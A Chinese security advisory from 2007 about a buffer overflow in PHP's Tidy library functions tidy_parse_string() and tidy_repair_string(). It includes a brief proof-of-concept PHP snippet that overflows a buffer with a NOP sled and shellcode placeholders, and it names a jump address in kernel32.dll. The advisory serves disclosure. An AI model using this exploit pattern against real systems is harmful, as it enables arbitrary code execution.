发布日期:2007-06-19
更新日期:2007-06-20
受影响系统:
C. Reitzel TidyLib for PHP 050506
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24527
Tidy库用于改正HTML文档中的常见错误并生成格式编排良好的等价文档,还可以生成XHTML格式的文档。
Tidy库实现上存在缓冲区溢出漏洞,攻击者可能利用此漏洞通过诱使用户处理恶意文档执行恶意指令。
PHP所使用的Tidy库中没有正确验证对tidy_parse_string()和tidy_repair_string()函数的输入。如果用户向这些函数传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意指令。
<*来源:rgod (rgod@autistici.org) *>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org
//quickly tested; //0x7C81518B call esp kernel32.dll
$NOP=str_repeat("x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>
建议:
--------------------------------------------------------------------------------
厂商补丁:
C. Reitzel
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://dev.int64.org/tidy.html
推荐阅读
AOL Instant Messenger SIP INVITE消息远程拒绝服务漏洞
【51CTO.com 独家消息】发布日期:2007-06-19 更新日期:2007-06-20受影响系统: AOL Instant Messenger 6.1.32.1 描述: -------------------------------------------------------------------------------->>>详细阅读
本文标题:PHP Tidy库远程缓冲区溢出漏洞
地址:http://www.17bianji.com/anquan/buding/2726.html
1/2 1